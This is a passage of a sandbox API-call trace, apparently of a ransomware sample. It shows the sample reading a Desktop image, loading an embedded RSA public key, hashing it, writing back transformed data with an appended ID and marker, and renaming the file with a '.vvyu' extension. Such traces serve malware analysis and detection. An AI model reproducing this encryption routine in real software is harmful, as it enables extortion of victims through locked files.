lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.420] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x7e1c, lpOverlapped=0x0) returned 1 [0183.420] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.420] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.420] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.420] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.421] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.421] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.421] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.421] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.421] GetLastError () returned 0x0 [0183.421] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.422] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.422] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.422] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.422] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7e20) returned 0x2d36670 [0183.422] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2c4afd0 [0183.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d2fc98 [0183.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d307f0 [0183.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e678 [0183.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30688 [0183.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e690 [0183.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6c0 [0183.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e768 [0183.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6d8 [0183.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x6d5c88 [0183.423] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6d5c88, Size=0x218) returned 0x2d3e498 [0183.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d3e6b8 [0183.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3e6b8 | out: hHeap=0x6a0000) returned 1 [0183.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e768 [0183.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0183.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6d8 [0183.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e6c0 [0183.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0183.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0183.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3e498 | out: hHeap=0x6a0000) returned 1 [0183.426] GetCurrentThreadId () returned 0x264 [0183.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce1d0 [0183.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.427] GetCurrentThreadId () returned 0x264 [0183.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e768 [0183.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6c0 [0183.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0183.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6d8 [0183.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6a8 [0183.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e780 [0183.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0183.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e750 [0183.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e738 [0183.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e798 [0183.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e738 [0183.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e750 | out: hHeap=0x6a0000) returned 1 [0183.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0183.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6c0 [0183.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3e498 [0183.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e768 | out: hHeap=0x6a0000) returned 1 [0183.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e798 | out: hHeap=0x6a0000) returned 1 [0183.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3e6a8 [0183.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d3e8c0 [0183.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.431] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3e6a8 | out: hHeap=0x6a0000) returned 1 [0183.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3e8c0 | out: hHeap=0x6a0000) returned 1 [0183.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e780 | out: hHeap=0x6a0000) returned 1 [0183.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30688 | out: hHeap=0x6a0000) returned 1 [0183.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3e498 | out: hHeap=0x6a0000) returned 1 [0183.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.439] WriteFile (in: hFile=0x584, lpBuffer=0x2d36670*, nNumberOfBytesToWrite=0x7e17, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d36670*, lpNumberOfBytesWritten=0x30ffb14*=0x7e17, lpOverlapped=0x0) returned 1 [0183.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.440] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x7e1c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.440] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d36670 [0183.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d36670, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d36aa0 [0183.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.441] WriteFile (in: hFile=0x584, lpBuffer=0x2d36aa0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d36aa0*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36aa0 | out: hHeap=0x6a0000) returned 1 [0183.442] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.442] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.442] CloseHandle (hObject=0x584) returned 1 [0183.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d36670 [0183.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.444] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\BnBjzEzhtTp-mHA.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\bnbjzezhttp-mha.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\BnBjzEzhtTp-mHA.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\bnbjzezhttp-mha.png.vvyu")) returned 1 [0183.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.452] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.455] 